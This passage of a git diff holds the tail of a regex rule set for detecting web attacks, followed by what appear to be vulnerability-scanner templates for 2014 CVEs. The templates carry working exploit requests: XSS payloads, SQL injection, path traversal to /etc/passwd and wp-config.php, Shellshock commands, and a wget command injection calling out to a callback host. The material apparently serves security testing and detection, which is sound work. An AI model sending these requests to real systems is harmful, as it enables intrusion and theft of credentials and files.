injections","tags":["xss","csrf"],"impact":5},{"id":26,"rule":"(?:[^:\\s\\w]+\\s*[^\\w\\/](href|protocol|host|hostname|pathname|hash|port|cookie)[^\\w])","description":"Detects JavaScript cookie stealing and redirection attempts","tags":["xss","csrf"],"impact":4},{"id":27,"rule":"(?:(?:vbs|vbscript|data):.*[,+])|(?:\\w+\\s*=\\W*(?!https?)\\w+:)|(jar:\\w+:)|(=\\s*\"?\\s*vbs(?:ript)?:)|(language\\s*=\\s?\"?\\s*vbs(?:ript)?)|on\\w+\\s*=\\*\\w+\\-\"?","description":"Detects data: URL injections, VBS injections and common URI schemes","tags":["xss","rfe"],"impact":5},{"id":28,"rule":"(?:firefoxurl:\\w+\\|)|(?:(?:file|res|telnet|nntp|news|mailto|chrome)\\s*:\\s*[%&#xu\\/]+)|(wyciwyg|firefoxurl\\s*:\\s*\\/\\s*\\/)","description":"Detects IE firefoxurl injections, cache poisoning attempts and local file inclusion/execution","tags":["xss","rfe","lfi","csrf"],"impact":5},{"id":29,"rule":"(?:binding\\s?=|moz-binding|behavior\\s?=)|(?:[\\s\\/]style\\s*=\\s*[-\\\\])","description":"Detects bindings and behavior injections","tags":["xss","csrf","rfe"],"impact":4},{"id":30,"rule":"(?:=\\s*\\w+\\s*\\+\\s*\")|(?:\\+=\\s*\\(\\s\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[s*\\])|(?:\"\\s*\\+\\s*\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\"\\s*[&|]+\\s*\")|(?:\\/\\s*\\?\\s*\")|(?:\\/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:]\\s*\\[\\W*\\w)|(?:[^\\s]\\s*=\\s*\\/)","description":"Detects common XSS concatenation patterns 1/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":31,"rule":"(?:=\\s*\\d*\\.\\d*\\?\\d*\\.\\d*)|(?:[|&]{2,}\\s*\")|(?:!\\d+\\.\\d*\\?\")|(?:\\/:[\\w.]+,)|(?:=[\\d\\W\\s]*\\[[^]]+\\])|(?:\\?\\w+:\\w+)","description":"Detects common XSS concatenation patterns 2/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":32,"rule":"(?:[^\\w\\s=]on(?!g\\&gt;)\\w+[^=_+-]*=[^$]+(?:\\W|\\&gt;)?)","description":"Detects possible event handlers","tags":["xss","csrf"],"impact":4},{"id":33,"rule":"(?:\\<\\w*:?\\s(?:[^\\>]*)t(?!rong))|(?:\\<scri)|(<\\w+:\\w+)","description":"Detects obfuscated script tags and XML wrapped HTML","tags":["xss"],"impact":4},{"id":34,"rule":"(?:\\<\\/\\w+\\s\\w+)|(?:@(?:cc_on|set)[\\s@,\"=])","description":"Detects attributes in closing tags and conditional compilation tokens","tags":["xss","csrf"],"impact":4},{"id":35,"rule":"(?:--[^\\n]*$)|(?:\\<!-|-->)|(?:[^*]\\/\\*|\\*\\/[^*])|(?:(?:[\\W\\d]#|--|{)$)|(?:\\/{3,}.*$)|(?:<!\\[\\W)|(?:\\]!>)","description":"Detects common comment types","tags":["xss","csrf","id"],"impact":3},{"id":37,"rule":"(?:\\<base\\s+)|(?:<!(?:element|entity|\\[CDATA))","description":"Detects base href injections and XML entity injections","tags":["xss","csrf","id"],"impact":5},{"id":38,"rule":"(?:\\<[\\/]?(?:[i]?frame|applet|isindex|marquee|keygen|script|audio|video|input|button|textarea|style|base|body|meta|link|object|embed|param|plaintext|xm\\w+|image|im(?:g|port)))","description":"Detects possibly malicious html elements including some attributes","tags":["xss","csrf","id","rfe","lfi"],"impact":4},{"id":39,"rule":"(?:\\\\x[01fe][\\db-ce-f])|(?:%[01fe][\\db-ce-f])|(?:&#[01fe][\\db-ce-f])|(?:\\\\[01fe][\\db-ce-f])|(?:&#x[01fe][\\db-ce-f])","description":"Detects nullbytes and other dangerous characters","tags":["id","rfe","xss"],"impact":5},{"id":40,"rule":"(?:\\)\\s*when\\s*\\d+\\s*then)|(?:\"\\s*(?:#|--|{))|(?:\\/\\*!\\s?\\d+)|(?:ch(?:a)?r\\s*\\(\\s*\\d)|(?:(?:(n?and|x?or|not)\\s+|\\|\\||\\&\\&)\\s*\\w+\\()","description":"Detects MySQL comments, conditions and ch(a)r injections","tags":["sqli","id","lfi"],"impact":6},{"id":41,"rule":"(?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[^\\s]+\\s*[^\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~])","description":"Detects conditional SQL injection attempts","tags":["sqli","id","lfi"],"impact":6},{"id":42,"rule":"(?:\"\\s*or\\s*\"?\\d)|(?:\\\\x(?:23|27|3d))|(?:^.?\"$)|(?:(?:^[\"\\\\]*(?:[\\d\"]+|[^\"]+\"))+\\s*(?:n?and|x?or|not|\\|\\||\\&\\&)\\s*[\\w\"[+&!@(),.-])|(?:[^\\w\\s]\\w+\\s*[|-]\\s*\"\\s*\\w)|(?:@\\w+\\s+(and|or)\\s*[\"\\d]+)|(?:@[\\w-]+\\s(and|or)\\s*[^\\w\\s])|(?:[^\\w\\s:]\\s*\\d\\W+[^\\w\\s]\\s*\".)|(?:\\Winformation_schema|table_name\\W)","description":"Detects classic SQL injection probings 1/2","tags":["sqli","id","lfi"],"impact":6},{"id":43,"rule":"(?:\"\\s*\\*.+(?:or|id)\\W*\"\\d)|(?:\\^\")|(?:^[\\w\\s\"-]+(?<=and\\s)(?<=or\\s)(?<=xor\\s)(?<=nand\\s)(?<=not\\s)(?<=\\|\\|)(?<=\\&\\&)\\w+\\()|(?:\"[\\s\\d]*[^\\w\\s]+\\W*\\d\\W*.*[\"\\d])|(?:\"\\s*[^\\w\\s?]+\\s*[^\\w\\s]+\\s*\")|(?:\"\\s*[^\\w\\s]+\\s*[\\W\\d].*(?:#|--))|(?:\".*\\*\\s*\\d)|(?:\"\\s*or\\s[^\\d]+[\\w-]+.*\\d)|(?:[()*<>%+-][\\w-]+[^\\w\\s]+\"[^,])","description":"Detects classic SQL injection probings 2/2","tags":["sqli","id","lfi"],"impact":6},{"id":44,"rule":"(?:\\d\"\\s+\"\\s+\\d)|(?:^admin\\s*\"|(\\/\\*)+\"+\\s?(?:--|#|\\/\\*|{)?)|(?:\"\\s*or[\\w\\s-]+\\s*[+<>=(),-]\\s*[\\d\"])|(?:\"\\s*[^\\w\\s]?=\\s*\")|(?:\"\\W*[+=]+\\W*\")|(?:\"\\s*[!=|][\\d\\s!=+-]+.*[\"(].*$)|(?:\"\\s*[!=|][\\d\\s!=]+.*\\d+$)|(?:\"\\s*like\\W+[\\w\"(])|(?:\\sis\\s*0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:\"[<>~]+\")","description":"Detects basic SQL authentication bypass attempts 1/3","tags":["sqli","id","lfi"],"impact":7},{"id":45,"rule":"(?:union\\s*(?:all|distinct|[(!@]*)\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()","description":"Detects basic SQL authentication bypass attempts 2/3","tags":["sqli","id","lfi"],"impact":7},{"id":46,"rule":"(?:in\\s*\\(+\\s*select)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w+]+(?:regexp\\s*\\(|sounds\\s+like\\s*\"|[=\\d]+x))|(\"\\s*\\d\\s*(?:--|#))|(?:\"[%&<>^=]+\\d\\s*(=|or))|(?:\"\\W+[\\w+-]+\\s*=\\s*\\d\\W+\")|(?:\"\\s*is\\s*\\d.+\"?\\w)|(?:\"\\|?[\\w-]{3,}[^\\w\\s.,]+\")|(?:\"\\s*is\\s*[\\d.]+\\s*\\W.*\")","description":"Detects basic SQL authentication bypass attempts 3/3","tags":["sqli","id","lfi"],"impact":7},{"id":47,"rule":"(?:[\\d\\W]\\s+as\\s*[\"\\w]+\\s*from)|(?:^[\\W\\d]+\\s*(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s+(?:(?:group_)concat|char|load_file)\\s?\\(?)|(?:end\\s*\\);)|(\"\\s+regexp\\W)|(?:[\\s(]load_file\\s*\\()","description":"Detects concatenated basic SQL injection and SQLLFI attempts","tags":["sqli","id","lfi"],"impact":5},{"id":48,"rule":"(?:@.+=\\s*\\(\\s*select)|(?:\\d+\\s*or\\s*\\d+\\s*[\\-+])|(?:\\/\\w+;?\\s+(?:having|and|or|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*(?:drop|alter))|(?:(?:;|#|--)\\s*(?:update|insert)\\s*\\w{2,})|(?:[^\\w]SET\\s*@\\w+)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*[!=+]+[\\s\\d]*[\"=()])","description":"Detects chained SQL injection attempts 1/2","tags":["sqli","id"],"impact":6},{"id":49,"rule":"(?:\"\\s+and\\s*=\\W)|(?:\\(\\s*select\\s*\\w+\\s*\\()|(?:\\*\\/from)|(?:\\+\\s*\\d+\\s*\\+\\s*@)|(?:\\w\"\\s*(?:[-+=|@]+\\s*)+[\\d(])|(?:coalesce\\s*\\(|@@\\w+\\s*[^\\w\\s])|(?:\\W!+\"\\w)|(?:\";\\s*(?:if|while|begin))|(?:\"[\\s\\d]+=\\s*\\d)|(?:order\\s+by\\s+if\\w*\\s*\\()|(?:[\\s(]+case\\d*\\W.+[tw]hen[\\s(])","description":"Detects chained SQL injection attempts 2/2","tags":["sqli","id"],"impact":6},{"id":50,"rule":"(?:(select|;)\\s+(?:benchmark|if|sleep)\\s*?\\(\\s*\\(?\\s*\\w+)","description":"Detects SQL benchmark and sleep injection attempts including conditional queries","tags":["sqli","id"],"impact":4},{"id":51,"rule":"(?:create\\s+function\\s+\\w+\\s+returns)|(?:;\\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*[\\[(]?\\w{2,})","description":"Detects MySQL UDF injection and other data/structure manipulation attempts","tags":["sqli","id"],"impact":6},{"id":52,"rule":"(?:alter\\s*\\w+.*character\\s+set\\s+\\w+)|(\";\\s*waitfor\\s+time\\s+\")|(?:\";.*:\\s*goto)","description":"Detects MySQL charset switch and MSSQL DoS attempts","tags":["sqli","id"],"impact":6},{"id":53,"rule":"(?:procedure\\s+analyse\\s*\\()|(?:;\\s*(declare|open)\\s+[\\w-]+)|(?:create\\s+(procedure|function)\\s*\\w+\\s*\\(\\s*\\)\\s*-)|(?:declare[^\\w]+[@#]\\s*\\w+)|(exec\\s*\\(\\s*@)","description":"Detects MySQL and PostgreSQL stored procedure/function injections","tags":["sqli","id"],"impact":7},{"id":54,"rule":"(?:select\\s*pg_sleep)|(?:waitfor\\s*delay\\s?\"+\\s?\\d)|(?:;\\s*shutdown\\s*(?:;|--|#|\\/\\*|{))","description":"Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts","tags":["sqli","id"],"impact":5},{"id":55,"rule":"(?:\\sexec\\s+xp_cmdshell)|(?:\"\\s*!\\s*[\"\\w])|(?:from\\W+information_schema\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\s*\\([^\\)]*)|(?:\";?\\s*(?:select|union|having)\\s*[^\\s])|(?:\\wiif\\s*\\()|(?:exec\\s+master\\.)|(?:union\\sselect\\s@)|(?:union[\\w(\\s]*select)|(?:select.*\\w?user\\()|(?:into[\\s+]+(?:dump|out)file\\s*\")","description":"Detects MSSQL code execution and information gathering attempts","tags":["sqli","id"],"impact":5},{"id":56,"rule":"(?:merge.*using\\s*\\()|(execute\\s*immediate\\s*\")|(?:\\W+\\d*\\s*having\\s*[^\\s\\-])|(?:match\\s*[\\w(),+-]+\\s*against\\s*\\()","description":"Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections","tags":["sqli","id"],"impact":5},{"id":57,"rule":"(?:,.*[)\\da-f\"]\"(?:\".*\"|\\Z|[^\"]+))|(?:\\Wselect.+\\W*from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*\\(\\s*space\\s*\\()","description":"Detects MySQL comment-/space-obfuscated injections and backtick termination","tags":["sqli","id"],"impact":5},{"id":58,"rule":"(?:@[\\w-]+\\s*\\()|(?:]\\s*\\(\\s*[\"!]\\s*\\w)|(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;[\\s\\w|]*\\$\\w+\\s*=)|(?:\\$\\w+\\s*=(?:(?:\\s*\\$?\\w+\\s*[(;])|\\s*\".*\"))|(?:;\\s*\\{\\W*\\w+\\s*\\()","description":"Detects code injection attempts 1/3","tags":["id","rfe","lfi"],"impact":7},{"id":59,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*(?:define|eval|file_get_contents|include|require|require_once|set|shell_exec|phpinfo|system|passthru|preg_\\w+|execute)\\s*[\"(@])","description":"Detects code injection attempts 2/3","tags":["id","rfe","lfi"],"impact":7},{"id":60,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*[^\\w](?:echo|print|print_r|var_dump|[fp]open))|(?:;\\s*rm\\s+-\\w+\\s+)|(?:;.*{.*\\$\\w+\\s*=)|(?:\\$\\w+\\s*\\[\\]\\s*=\\s*)","description":"Detects code injection attempts 3/3","tags":["id","rfe","lfi"],"impact":7},{"id":62,"rule":"(?:function[^(]*\\([^)]*\\))|(?:(?:delete|void|throw|instanceof|new|typeof)[^\\w.]+\\w+\\s*[([])|([)\\]]\\s*\\.\\s*\\w+\\s*=)|(?:\\(\\s*new\\s+\\w+\\s*\\)\\.)","description":"Detects common function declarations and special JS operators","tags":["id","rfe","lfi"],"impact":5},{"id":63,"rule":"(?:[\\w.-]+@[\\w.-]+%(?:[01][\\db-ce-f])+\\w+:)","description":"Detects common mail header injections","tags":["id","spam"],"impact":5},{"id":64,"rule":"(?:\\.pl\\?\\w+=\\w?\\|\\w+;)|(?:\\|\\(\\w+=\\*)|(?:\\*\\s*\\)+\\s*;)","description":"Detects perl echo shellcode injection and LDAP vectors","tags":["lfi","rfe"],"impact":5},{"id":65,"rule":"(?:(^|\\W)const\\s+[\\w\\-]+\\s*=)|(?:(?:do|for|while)\\s*\\([^;]+;+\\))|(?:(?:^|\\W)on\\w+\\s*=[\\w\\W]*(?:on\\w+|alert|eval|print|confirm|prompt))|(?:groups=\\d+\\(\\w+\\))|(?:(.)\\1{128,})","description":"Detects basic XSS DoS attempts","tags":["rfe","dos"],"impact":5},{"id":67,"rule":"(?:\\({2,}\\+{2,}:{2,})|(?:\\({2,}\\+{2,}:+)|(?:\\({3,}\\++:{2,})|(?:\\$\\[!!!\\])","description":"Detects unknown attack vectors based on PHPIDS Centrifuge detection","tags":["xss","csrf","id","rfe","lfi"],"impact":7},{"id":68,"rule":"(?:[\\s\\/\"]+[-\\w\\/\\\\\\*]+\\s*=.+(?:\\/\\s*>))","description":"Finds attribute breaking injections including obfuscated attributes","tags":["xss","csrf"],"impact":4},{"id":69,"rule":"(?:(?:msgbox|eval)\\s*\\+|(?:language\\s*=\\*vbscript))","description":"Finds basic VBScript injection attempts","tags":["xss","csrf"],"impact":4},{"id":70,"rule":"(?:\\[\\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|or)\\])","description":"Finds basic MongoDB SQL injection attempts","tags":["sqli"],"impact":4},{"id":71,"rule":"(?:[\\s\\d\\/\"]+(?:on\\w+|style|poster|background)=[$\"\\w])|(?:-type\\s*:\\s*multipart)","description":"finds malicious attribute injection attempts and MHTML attacks","tags":["xss","csrf"],"impact":6},{"id":72,"rule":"(?:(sleep\\((\\s*)(\\d*)(\\s*)\\)|benchmark\\((.*)\\,(.*)\\)))","description":"Detects blind sqli tests using sleep() or benchmark().","tags":["sqli","id"],"impact":4},{"id":73,"rule":"(?:(\\%SYSTEMROOT\\%))","description":"An attacker is trying to locate a file to read or write.","tags":["files","id"],"impact":4},{"id":75,"rule":"(?:(((.*)\\%[c|d|i|e|f|g|o|s|u|x|p|n]){8}))","description":"Looking for a format string attack","tags":["format string"],"impact":4},{"id":76,"rule":"(?:(union(.*)select(.*)from))","description":"Looking for basic sql injection. Common attack string for mysql, oracle and others.","tags":["sqli","id"],"impact":3},{"id":77,"rule":"(?:^(-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2250738585072007e-308|1e309)$)","description":"Looking for intiger overflow attacks, these are taken from skipfish, except 2.2250738585072007e-308 is the \"magic number\" crash","tags":["sqli","id"],"impact":3},{"id":78,"rule":"(?:%23.*?%0A)","description":"Detects SQL comment filter evasion","tags":["format string"],"impact":10},{"id":79,"rule":"((burpcollaborator|pipedream)\\.net|(canarytokens|requestrepo)\\.com|oast\\.(online|(liv|sit|m)e|fun|pro)|\\.ngrok(\\-free\\.(app|dev)|\\.((app|io)|dev)))","description":"Detects out-of-band (OOB) interaction or Server-Side Request Forgery (SSRF) attack attempts","tags":["ssrf","oob"],"impact":10},{"id":80,"rule":"(?i)(?:on(?:webkitanimationiteration|(?:(?:webkitanimation|(?:select|drag))s|t(?:ransition|ouch)s)tart|(?:webkit(?:transi|anima)tione|t(?:ransition|ouch)e|scrolle)nd|(?:beforescriptexecut|afterscriptexecut|(?:p(?:ointerrawupda|(?:opsta|as))|timeupda)t|b(?:eforetoggl|ounc)|(?:pointer|drag)leav|(?:pointer|touch)mov|mouse(?:lea|mo)v|pa(?:gehid|us)|resiz|clos)e|(?:mozfullscreen|fullscreen|(?:selec|dura)tion|hash|cue)change|unhandledrejection|a(?:nimation(?:iteration|cancel|start|end)|fterprint|uxclick)|transitioncancel|toggle\\(popover\\)|loaded(?:meta)?data|(?:canplaythroug|searc)h|(?:transitionru|(?:pointer|key)dow|mousedow|(?:focus|beg)i)n|pointerenter|(?:beforeunloa|invali|(?:seek|end)e|unloa)d|volumechange|c(?:(?:ontextmenu|ut)|opy)|(?:pointerov|drag(?:ent|ov))er|(?:(?:beforeinp|focuso)u|beforeprin|pointerou|beforecu|mouseou|submi|re(?:pea|se)|inpu)t|beforecopy|mouse(?:enter|over|up)|(?:mouse)?wheel|ratechange|(?:pointeru|keyu|dro)p|pageshow|progress|keypress|dblclick|canplay|dragend|playing|s(?:eeking|how)|message|s(?:croll|elect)|toggle|finish|change|focus|(?:erro|blu)r|click|start|drag|load|play|end))\\s*?=","description":"Detects common event attributes and properties","tags":["xss","csrf","id","rfe"],"impact":6}]}
diff --git a/db/cves.json b/db/cves.json
new file mode 100644
index 00000000..942c4f68
--- /dev/null
+++ b/db/cves.json
@@ -0,0 +1 @@
+{"templates":[{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Search public registries"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ActiveHelper LiveHelp Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["","/cgi-bin/status","/cgi-bin/stats","/cgi-bin/test","/cgi-bin/status/status.cgi","/test.cgi","/debug.cgi","/cgi-bin/test-cgi","/cgi-bin/test.cgi"]},"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/movies/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Movies =","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag 